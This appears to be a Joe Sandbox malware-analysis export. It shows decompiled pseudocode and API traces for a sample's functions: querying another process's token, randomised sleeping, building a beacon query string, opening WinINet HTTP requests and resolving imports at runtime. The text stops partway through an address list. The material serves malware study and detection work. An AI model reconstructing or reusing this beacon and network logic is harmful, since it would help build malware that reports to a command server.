Associated: 00000003.00000002.2850317067.0000000002B8C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b80000_server.jbxd

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID:
API String ID: 3239747167-0
Opcode ID: b70fa4a44d257241deb5b0d88d2e855711cfab7a3ec4d91d383dd23ef987d030
Instruction ID: 15136feb33826c3e5f2a1c71dee5c5afcd2e9928499d91bb671c298be49abaa5
Opcode Fuzzy Hash: b70fa4a44d257241deb5b0d88d2e855711cfab7a3ec4d91d383dd23ef987d030
Instruction Fuzzy Hash: E8311C71A00209EFDB10EFA9DD81A6EB7F9FB48740F6184A9E549D3210E730EA55DF11

Uniqueness

Uniqueness Score: -1.00%

Function 02B8421F Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 38%

			E02B8421F(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E02B833DC(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E02B861DA(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x02b8422c
0x02b8422d
0x02b8422e
0x02b8422f
0x02b84230
0x02b84234
0x02b8423b
0x02b8424a
0x02b8424d
0x02b84250
0x02b84257
0x02b8425a
0x02b8425d
0x02b84260
0x02b84263
0x02b8426e
0x02b84270
0x02b84279
0x02b84281
0x02b84283
0x02b84295
0x02b8429f
0x02b842a3
0x02b842b2
0x02b842b6
0x02b842bf
0x02b842c7
0x02b842c7
0x02b842c9
0x02b842c9
0x02b842d1
0x02b842d7
0x02b842db
0x02b842db
0x02b842e6

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 02B84266
NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 02B84279
NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 02B84295

Part of subcall function 02B833DC: RtlAllocateHeap.NTDLL(00000000,00000000,02B862F6), ref: 02B833E8

NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 02B842B2
memcpy.NTDLL(?,00000000,0000001C), ref: 02B842BF
NtClose.NTDLL(?), ref: 02B842D1
NtClose.NTDLL(00000000), ref: 02B842DB

Memory Dump Source

Source File: 00000003.00000002.2850178397.0000000002B81000.00000020.10000000.00040000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000003.00000002.2850140137.0000000002B80000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850249913.0000000002B89000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850274392.0000000002B8A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850317067.0000000002B8C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b80000_server.jbxd

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: dc64a28d2ea22f6d3090569ed9fd7431af50dc4e75be091ceb54347d6185a4f2
Instruction ID: 5de388ce9fbc3e25d920ea43be773f4e002aa48dba25de0cc607935ee9784ea4
Opcode Fuzzy Hash: dc64a28d2ea22f6d3090569ed9fd7431af50dc4e75be091ceb54347d6185a4f2
Instruction Fuzzy Hash: 4A210771910119BBDF01AFA5CC44AEEBFBDEB08750F104062F909A6250D7718A54DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B8213E Relevance: 6.0, APIs: 4, Instructions: 44
sleepthreadtimeCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E02B8213E(void* __ecx, intOrPtr _a4) {
				struct _FILETIME _v12;
				int _t13;
				signed int _t16;
				void* _t17;
				signed int _t18;
				unsigned int _t22;
				void* _t30;
				signed int _t34;

				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
				asm("stosd");
				do {
					_t13 = SwitchToThread();
					GetSystemTimeAsFileTime( &_v12);
					_t22 = _v12.dwHighDateTime;
					_t16 = (_t22 << 0x00000020 | _v12.dwLowDateTime) >> 5;
					_push(0);
					_push(0x13);
					_push(_t22 >> 5);
					_push(_t16);
					L02B88436();
					_t34 = _t16 + _t13;
					_t17 = E02B86269(_a4, _t34);
					_t30 = _t17;
					_t18 = 3;
					Sleep(_t18 << (_t34 & 0x00000007)); // executed
				} while (_t30 == 1);
				return _t30;
			}

0x02b82143
0x02b8214e
0x02b8214f
0x02b8214f
0x02b8215b
0x02b82164
0x02b82167
0x02b8216b
0x02b8216d
0x02b82172
0x02b82173
0x02b82174
0x02b8217e
0x02b82181
0x02b82188
0x02b8218c
0x02b82193
0x02b82199
0x02b821a3

APIs

SwitchToThread.KERNEL32(?,00000001,?,?,?,02B85044,?,?), ref: 02B8214F
GetSystemTimeAsFileTime.KERNEL32(00000000,?,00000001,?,?,?,02B85044,?,?), ref: 02B8215B
_aullrem.NTDLL(00000000,?,00000013,00000000), ref: 02B82174

Part of subcall function 02B86269: memcpy.NTDLL(00000000,00000002,?,?,?,00000000,00000000), ref: 02B86308

Sleep.KERNELBASE(00000003,00000000,?,00000001,?,?,?,02B85044,?,?), ref: 02B82193

Memory Dump Source

Source File: 00000003.00000002.2850178397.0000000002B81000.00000020.10000000.00040000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000003.00000002.2850140137.0000000002B80000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850249913.0000000002B89000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850274392.0000000002B8A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850317067.0000000002B8C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b80000_server.jbxd

Similarity

API ID: Time$FileSleepSwitchSystemThread_aullremmemcpy
String ID:
API String ID: 1610602887-0
Opcode ID: 673cdf62bb563d00e4cec3cdf4ec77c8c01580fe32fffb388d753cdc9ab8ace3
Instruction ID: a3e2dc6bcc0de60e604822ecceb0a472abc81740b5bc8795384be73e691e6c43
Opcode Fuzzy Hash: 673cdf62bb563d00e4cec3cdf4ec77c8c01580fe32fffb388d753cdc9ab8ace3
Instruction Fuzzy Hash: 35F0A477B402047BDB15AAA4CC19FEF76BADB843A1F140564E606E7340E6B49A01CA90

Uniqueness

Uniqueness Score: -1.00%

Function 02B83CE0 Relevance: 37.7, APIs: 25, Instructions: 222
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E02B83CE0(long __eax, void* __ecx, void* __edx, void* _a12, intOrPtr _a20) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v48;
				intOrPtr _v56;
				void* __edi;
				intOrPtr _t30;
				void* _t31;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				intOrPtr _t36;
				intOrPtr _t37;
				void* _t40;
				intOrPtr _t41;
				int _t44;
				intOrPtr _t45;
				int _t48;
				void* _t49;
				intOrPtr _t53;
				intOrPtr _t59;
				intOrPtr _t63;
				intOrPtr* _t65;
				void* _t66;
				intOrPtr _t71;
				intOrPtr _t77;
				intOrPtr _t80;
				intOrPtr _t83;
				int _t86;
				intOrPtr _t88;
				int _t91;
				intOrPtr _t93;
				int _t96;
				void* _t98;
				void* _t99;
				void* _t103;
				void* _t105;
				void* _t106;
				intOrPtr _t107;
				long _t109;
				intOrPtr* _t110;
				intOrPtr* _t111;
				long _t112;
				int _t113;
				void* _t114;
				void* _t115;
				void* _t116;
				void* _t119;
				void* _t120;
				void* _t122;
				void* _t123;

				_t103 = __edx;
				_t99 = __ecx;
				_t120 =  &_v16;
				_t112 = __eax;
				_t30 =  *0x2b8a3e0; // 0x5589c10
				_v4 = _t30;
				_v8 = 8;
				_t31 = RtlAllocateHeap( *0x2b8a2d8, 0, 0x800); // executed
				_t98 = _t31;
				if(_t98 != 0) {
					if(_t112 == 0) {
						_t112 = GetTickCount();
					}
					_t33 =  *0x2b8a018; // 0x1cbd107f
					asm("bswap eax");
					_t34 =  *0x2b8a014; // 0x80659e7b
					asm("bswap eax");
					_t35 =  *0x2b8a010; // 0x80f8840a
					asm("bswap eax");
					_t36 =  *0x2b8a00c; // 0xef55b4f9
					asm("bswap eax");
					_t37 =  *0x2b8a348; // 0x29fd5b8
					_t3 = _t37 + 0x2b8b5ac; // 0x74666f73
					_t113 = wsprintfA(_t98, _t3, 2, 0x3d18f, _t36, _t35, _t34, _t33,  *0x2b8a02c,  *0x2b8a004, _t112);
					_t40 = E02B8467F();
					_t41 =  *0x2b8a348; // 0x29fd5b8
					_t4 = _t41 + 0x2b8b575; // 0x74707526
					_t44 = wsprintfA(_t113 + _t98, _t4, _t40);
					_t122 = _t120 + 0x38;
					_t114 = _t113 + _t44;
					if(_a12 != 0) {
						_t93 =  *0x2b8a348; // 0x29fd5b8
						_t8 = _t93 + 0x2b8b508; // 0x732526
						_t96 = wsprintfA(_t114 + _t98, _t8, _a12);
						_t122 = _t122 + 0xc;
						_t114 = _t114 + _t96;
					}
					_t45 =  *0x2b8a348; // 0x29fd5b8
					_t10 = _t45 + 0x2b8b246; // 0x74636126
					_t48 = wsprintfA(_t114 + _t98, _t10, 0);
					_t123 = _t122 + 0xc;
					_t115 = _t114 + _t48; // executed
					_t49 = E02B8472F(_t99); // executed
					_t105 = _t49;
					if(_t105 != 0) {
						_t88 =  *0x2b8a348; // 0x29fd5b8
						_t12 = _t88 + 0x2b8b8d0; // 0x736e6426
						_t91 = wsprintfA(_t115 + _t98, _t12, _t105);
						_t123 = _t123 + 0xc;
						_t115 = _t115 + _t91;
						HeapFree( *0x2b8a2d8, 0, _t105);
					}
					_t106 = E02B81340();
					if(_t106 != 0) {
						_t83 =  *0x2b8a348; // 0x29fd5b8
						_t14 = _t83 + 0x2b8b8c5; // 0x6f687726
						_t86 = wsprintfA(_t115 + _t98, _t14, _t106);
						_t123 = _t123 + 0xc;
						_t115 = _t115 + _t86;
						HeapFree( *0x2b8a2d8, 0, _t106);
					}
					_t107 =  *0x2b8a3cc; // 0x5589610
					_a20 = E02B86B59(0x2b8a00a, _t107 + 4);
					_t53 =  *0x2b8a36c; // 0x55895c0
					_t109 = 0;
					if(_t53 != 0) {
						_t80 =  *0x2b8a348; // 0x29fd5b8
						_t17 = _t80 + 0x2b8b8be; // 0x3d736f26
						wsprintfA(_t115 + _t98, _t17, _t53);
					}
					if(_a20 != _t109) {
						_t116 = RtlAllocateHeap( *0x2b8a2d8, _t109, 0x800);
						if(_t116 != _t109) {
							E02B82915(GetTickCount());
							_t59 =  *0x2b8a3cc; // 0x5589610
							__imp__(_t59 + 0x40);
							asm("lock xadd [eax], ecx");
							_t63 =  *0x2b8a3cc; // 0x5589610
							__imp__(_t63 + 0x40);
							_t65 =  *0x2b8a3cc; // 0x5589610
							_t66 = E02B86675(1, _t103, _t98,  *_t65); // executed
							_t119 = _t66;
							asm("lock xadd [eax], ecx");
							if(_t119 != _t109) {
								StrTrimA(_t119, 0x2b89280);
								_push(_t119);
								_t71 = E02B87563();
								_v20 = _t71;
								if(_t71 != _t109) {
									_t110 = __imp__;
									 *_t110(_t119, _v8);
									 *_t110(_t116, _v8);
									_t111 = __imp__;
									 *_t111(_t116, _v32);
									 *_t111(_t116, _t119);
									_t77 = E02B821A6(0xffffffffffffffff, _t116, _v28, _v24); // executed
									_v56 = _t77;
									if(_t77 != 0 && _t77 != 0x10d2) {
										E02B863F6();
									}
									HeapFree( *0x2b8a2d8, 0, _v48);
									_t109 = 0;
								}
								HeapFree( *0x2b8a2d8, _t109, _t119);
							}
							RtlFreeHeap( *0x2b8a2d8, _t109, _t116); // executed
						}
						HeapFree( *0x2b8a2d8, _t109, _a12);
					}
					RtlFreeHeap( *0x2b8a2d8, _t109, _t98); // executed
				}
				return _v16;
			}

0x02b83ce0
0x02b83ce0
0x02b83ce0
0x02b83cf5
0x02b83cf7
0x02b83cfc
0x02b83d00
0x02b83d08
0x02b83d0e
0x02b83d12
0x02b83d1a
0x02b83d22
0x02b83d22
0x02b83d24
0x02b83d30
0x02b83d3f
0x02b83d44
0x02b83d47
0x02b83d4c
0x02b83d4f
0x02b83d54
0x02b83d57
0x02b83d63
0x02b83d70
0x02b83d72
0x02b83d78
0x02b83d7d
0x02b83d88
0x02b83d8a
0x02b83d8d
0x02b83d93
0x02b83d95
0x02b83d9e
0x02b83da9
0x02b83dab
0x02b83dae
0x02b83dae
0x02b83db0
0x02b83db5
0x02b83dc1
0x02b83dc3
0x02b83dc6
0x02b83dc8
0x02b83dcd
0x02b83dd1
0x02b83dd3
0x02b83dd8
0x02b83de4
0x02b83de6
0x02b83df2
0x02b83df4
0x02b83df4
0x02b83dff
0x02b83e03
0x02b83e05
0x02b83e0a
0x02b83e16
0x02b83e18
0x02b83e24
0x02b83e26
0x02b83e26
0x02b83e2c
0x02b83e3f
0x02b83e43
0x02b83e48
0x02b83e4c
0x02b83e4f
0x02b83e54
0x02b83e5e
0x02b83e60
0x02b83e67
0x02b83e7f
0x02b83e83
0x02b83e8f
0x02b83e94
0x02b83e9d
0x02b83eae
0x02b83eb2
0x02b83ebb
0x02b83ec1
0x02b83ec9
0x02b83ece
0x02b83edb
0x02b83ee1
0x02b83eed
0x02b83ef3
0x02b83ef4
0x02b83ef9
0x02b83eff
0x02b83f05
0x02b83f0c
0x02b83f13
0x02b83f19
0x02b83f20
0x02b83f24
0x02b83f2f
0x02b83f34
0x02b83f3a
0x02b83f43
0x02b83f43
0x02b83f54
0x02b83f5a
0x02b83f5a
0x02b83f64
0x02b83f64
0x02b83f72
0x02b83f72
0x02b83f83
0x02b83f83
0x02b83f91
0x02b83f91
0x02b83fa2

APIs

RtlAllocateHeap.NTDLL ref: 02B83D08
GetTickCount.KERNEL32 ref: 02B83D1C
wsprintfA.USER32 ref: 02B83D6B
wsprintfA.USER32 ref: 02B83D88
wsprintfA.USER32 ref: 02B83DA9
wsprintfA.USER32 ref: 02B83DC1
wsprintfA.USER32 ref: 02B83DE4
HeapFree.KERNEL32(00000000,00000000), ref: 02B83DF4
wsprintfA.USER32 ref: 02B83E16
HeapFree.KERNEL32(00000000,00000000), ref: 02B83E26
wsprintfA.USER32 ref: 02B83E5E
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02B83E79
GetTickCount.KERNEL32 ref: 02B83E89
RtlEnterCriticalSection.NTDLL(055895D0), ref: 02B83E9D
RtlLeaveCriticalSection.NTDLL(055895D0), ref: 02B83EBB

Part of subcall function 02B86675: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,7625E910,02B83ECE,00000000,05589610), ref: 02B866A0
Part of subcall function 02B86675: lstrlen.KERNEL32(00000000,?,7625E910,02B83ECE,00000000,05589610), ref: 02B866A8
Part of subcall function 02B86675: strcpy.NTDLL ref: 02B866BF
Part of subcall function 02B86675: lstrcat.KERNEL32(00000000,00000000), ref: 02B866CA
Part of subcall function 02B86675: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,02B83ECE,?,7625E910,02B83ECE,00000000,05589610), ref: 02B866E7

StrTrimA.SHLWAPI(00000000,02B89280,00000000,05589610), ref: 02B83EED

Part of subcall function 02B87563: lstrlen.KERNEL32(05589C00,00000000,00000000,00000000,02B83EF9,00000000), ref: 02B87573
Part of subcall function 02B87563: lstrlen.KERNEL32(?), ref: 02B8757B
Part of subcall function 02B87563: lstrcpy.KERNEL32(00000000,05589C00), ref: 02B8758F
Part of subcall function 02B87563: lstrcat.KERNEL32(00000000,?), ref: 02B8759A

lstrcpy.KERNEL32(00000000,?), ref: 02B83F0C
lstrcpy.KERNEL32(00000000,?), ref: 02B83F13
lstrcat.KERNEL32(00000000,?), ref: 02B83F20
lstrcat.KERNEL32(00000000,00000000), ref: 02B83F24

Part of subcall function 02B821A6: WaitForSingleObject.KERNEL32(00000000,74ACE5D0,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02B82258

HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 02B83F54
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02B83F64
RtlFreeHeap.NTDLL(00000000,00000000,00000000,05589610), ref: 02B83F72
HeapFree.KERNEL32(00000000,?), ref: 02B83F83
RtlFreeHeap.NTDLL(00000000,00000000), ref: 02B83F91

Memory Dump Source

Source File: 00000003.00000002.2850178397.0000000002B81000.00000020.10000000.00040000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000003.00000002.2850140137.0000000002B80000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850249913.0000000002B89000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850274392.0000000002B8A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850317067.0000000002B8C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b80000_server.jbxd

Similarity

API ID: Heap$Freewsprintf$lstrcatlstrlen$lstrcpy$AllocateCountCriticalSectionTickTrim$EnterLeaveObjectSingleWaitstrcpy
String ID:
API String ID: 186568778-0
Opcode ID: b6c81c111abcc839c831e76afdb1ffa575eccc45cef3ebb5921edca754a261f5
Instruction ID: bb5158728e958ab40ba56ec5e4671d63dbcfe76ba8322a048a0525d6e6f1a651
Opcode Fuzzy Hash: b6c81c111abcc839c831e76afdb1ffa575eccc45cef3ebb5921edca754a261f5
Instruction Fuzzy Hash: 2171E371840604EFCB21AF68EC48EAB3BF8EB88784B150956F94DD7210D732E925DB61

Uniqueness

Uniqueness Score: -1.00%

Function 02B87B83 Relevance: 19.6, APIs: 13, Instructions: 126
networkstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E02B87B83(void* __eax, void* __ecx, long __esi, char* _a4) {
				void _v8;
				long _v12;
				void _v16;
				void* _t34;
				void* _t38;
				void* _t40;
				char* _t56;
				long _t57;
				void* _t58;
				intOrPtr _t59;
				long _t65;

				_t65 = __esi;
				_t58 = __ecx;
				_v16 = 0xea60;
				__imp__( *(__esi + 4));
				_v12 = __eax + __eax;
				_t56 = E02B833DC(__eax + __eax + 1);
				if(_t56 != 0) {
					if(InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0) == 0) {
						E02B861DA(_t56);
					} else {
						E02B861DA( *(__esi + 4));
						 *(__esi + 4) = _t56;
					}
				}
				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
				 *(_t65 + 0x10) = _t34;
				if(_t34 == 0 || InternetSetStatusCallback(_t34, E02B87B18) == 0xffffffff) {
					L15:
					return GetLastError();
				} else {
					ResetEvent( *(_t65 + 0x1c));
					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x50, 0, 0, 3, 0, _t65); // executed
					 *(_t65 + 0x14) = _t38;
					if(_t38 != 0 || GetLastError() == 0x3e5 && E02B816B2( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
						_t59 =  *0x2b8a348; // 0x29fd5b8
						_t15 = _t59 + 0x2b8b845; // 0x544547
						_v8 = 0x84404000;
						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84404000, _t65); // executed
						 *(_t65 + 0x18) = _t40;
						if(_t40 == 0) {
							goto L15;
						}
						_t57 = 4;
						_v12 = _t57;
						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
							_v8 = _v8 | 0x00000100;
							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
						}
						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
							goto L15;
						} else {
							return 0;
						}
					} else {
						goto L15;
					}
				}
			}

0x02b87b83
0x02b87b83
0x02b87b8e
0x02b87b95
0x02b87b9d
0x02b87ba7
0x02b87bad
0x02b87bc0
0x02b87bd0
0x02b87bc2
0x02b87bc5
0x02b87bca
0x02b87bca
0x02b87bc0
0x02b87be0
0x02b87be6
0x02b87beb
0x02b87cd4
0x00000000
0x02b87c06
0x02b87c09
0x02b87c1c
0x02b87c22
0x02b87c27
0x02b87c4f
0x02b87c62
0x02b87c6c
0x02b87c6f
0x02b87c75
0x02b87c7a
0x00000000
0x00000000
0x02b87c7e
0x02b87c8a
0x02b87c9b
0x02b87c9d
0x02b87cae
0x02b87cae
0x02b87cbe
0x00000000
0x02b87cd0
0x00000000
0x02b87cd0
0x00000000
0x00000000
0x00000000
0x02b87c27

APIs

lstrlen.KERNEL32(?,00000008,74AC4670), ref: 02B87B95

Part of subcall function 02B833DC: RtlAllocateHeap.NTDLL(00000000,00000000,02B862F6), ref: 02B833E8

InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 02B87BB8
InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 02B87BE0
InternetSetStatusCallback.WININET(00000000,02B87B18), ref: 02B87BF7
ResetEvent.KERNEL32(?), ref: 02B87C09
InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,?), ref: 02B87C1C
GetLastError.KERNEL32 ref: 02B87C29
HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84404000,?), ref: 02B87C6F
InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 02B87C8D
InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 02B87CAE
InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 02B87CBA
InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 02B87CCA
GetLastError.KERNEL32 ref: 02B87CD4

Part of subcall function 02B861DA: RtlFreeHeap.NTDLL(00000000,00000000,02B86383,00000000,?,00000000,00000000), ref: 02B861E6

Memory Dump Source

Source File: 00000003.00000002.2850178397.0000000002B81000.00000020.10000000.00040000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000003.00000002.2850140137.0000000002B80000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850249913.0000000002B89000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850274392.0000000002B8A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.2850317067.0000000002B8C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2b80000_server.jbxd

Similarity

API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
String ID:
API String ID: 2290446683-0
Opcode ID: a58deaf5fbbb167aa70b91ff144e38d573bd1f395f7de3720523e4f8112c972c
Instruction ID: 8adc023070c5e8a8f426f6f59a11fa2467116e327bb8ac67a412ef39b090837a
Opcode Fuzzy Hash: a58deaf5fbbb167aa70b91ff144e38d573bd1f395f7de3720523e4f8112c972c
Instruction Fuzzy Hash: 71418175900604BFDB31AF65CC48E6BBFBDEB45748F204999F60AE2190DB309554DF20

Uniqueness

Uniqueness Score: -1.00%

Function 02B87FC5 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			E02B87FC5(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				struct HINSTANCE__* _t99;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x2b80000;
				_t115 = _t139[3] + 0x2b80000;
				_t131 = _t139[4] + 0x2b80000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x2b80000;
				_v16 = _t139[5] + 0x2b80000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x2b80002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x2b8a1c0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x2b8a1c0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x2b8a1c0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x2b8a1bc; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x2b8a1c0; // 0x0
					if(_t98 == 0) {
						L9:
						_t99 = LoadLibraryA(_v60); // executed
						_t138 = _t99;
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x2b8a1b8; // 0x0
										 *_t102 = _t125;
										 *0x2b8a1b8 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x2b8a1bc; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}

0x02b87fd4
0x02b87fea
0x02b87ff0
0x02b87ff2
0x02b87ff7
0x02b87ffd
0x02b88002
0x02b88005
0x02b88013
0x02b8801a
0x02b8801d
0x02b88020
0x02b88021
0x02b88024
0x02b88027
0x02b8802a
0x02b8802f
0x02b8803e
0x00000000
0x02b88044
0x02b8804e
0x02b88058
0x02b8805d
0x02b8805f
0x02b88069
0x02b8806c
0x02b8806f
0x02b88075
0x02b88077
0x02b88077
0x02b8807a
0x02b8807d
0x02b88082
0x02b88086
0x02b88099
0x02b8809b
0x02b88143
0x02b88143
0x02b8814a
0x02b8814d
0x02b88157
0x02b88157
0x02b8815b
0x02b881d9
0x02b881dc
0x02b881de
0x02b881de
0x02b881e5
0x02b881e7
0x02b881f1
0x02b881f4
0x02b881f7
0x02b881f7
0x00000000
0x02b8815d
0x02b88160
0x02b8818e
0x02b88198
0x02b8819c
0x02b881a4
0x02b881a7
0x02b881ae
0x02b881b8
0x02b881b8
0x02b881bc
0x02b881c1
0x02b881d0
0x02b881d6
0x02b881d6
0x02b881bc
0x00000000
0x02b88167
0x02b8816a
0x02b88172
0x02b88187
0x02b8818c
